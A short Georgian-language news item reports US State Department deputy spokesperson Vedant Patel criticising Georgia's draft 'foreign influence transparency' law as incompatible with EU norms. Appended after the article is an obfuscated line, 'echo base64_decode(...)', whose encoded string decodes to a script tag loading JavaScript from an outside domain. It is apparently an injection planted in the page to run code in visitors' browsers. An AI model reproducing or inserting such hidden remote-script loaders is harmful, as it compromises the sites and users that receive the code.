celsiusi
ავერსი საქკაბელი

 ჩვენ მოვუწოდებთ საქართველოს მთავრობას, გაითვალისწინოს გაფრთხილებები, რომ ეს კანონი არ შეესაბამება ევროკავშირის ნორმებსა და ღირებულებებს, – ამის შესახებ აშშ-ის სახელმწიფო დეპარტამენტის პრესსპიკერის მოადგილემ, ვედანტ პატელიმ „უცხოური გავლენის გამჭვირვალობის შესახებ“ კანონპროექტთან დაკავშირებით დასმულ კითხვაზე პასუხისას განაცხადა.

მისი თქმით, ეს საქართველოს ევროკავშირის გზაზე პროგრესს ხელს შეუშლის.

„ჩვენ ღრმად ვართ შეშფოთებული, თუ ეს კანონი იქნება მიღებული, ამან შეიძლება, სტიგმატიზაცია მოახდინოს სამოქალაქო საზოგადოების ორგანიზაციების, რომლებიც საქართველოს მოქალაქეების ცხოვრების გასაუმჯობესებლად მუშაობენ და იმ მედიაორგანიზაციების, რომლებიც ცდილობენ, მოქალაქეებს ინფორმაცია მიაწოდონ. ჩვენ ვფიქრობთ, რომ სამოქალაქო საზოგადოება, მედიაორგანიზაციები ნებისმიერი დემოკრატიული საზოგადოების ქვაკუთხედია. ჩვენ მოვუწოდებთ საქართველოს მთავრობას, გაითვალისწინოს გაფრთხილებები, რომ ეს კანონი არ შეესაბამება ევროკავშირის ნორმებსა და ღირებულებებს და ეს საქართველოს ევროკავშირის გზაზე პროგრესს ხელს შეუშლის.

ჩვენ არასდროს ვფიქრობთ, რომ დიპლომატია მკვდარია. ჩვენ გავაგრძელებთ მოწოდებას და გავუმეორებთ საქართველოს მთავრობას ჩვენ შეშფოთებას ამ კანონმდებლობის შესახებ, გავაფრთხილებთ, რომ მსგავსი კანონმდებლობა არ არის თავსებადი ევროკავშირის ნორმებთან და ღირებულებებთან, რომელიც ნეგატიურად იმოქმედებს საქართველოს მიზანზე, გახდეს ევროკავშირის წევრი“, – განაცხადა პატელმა.

121
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");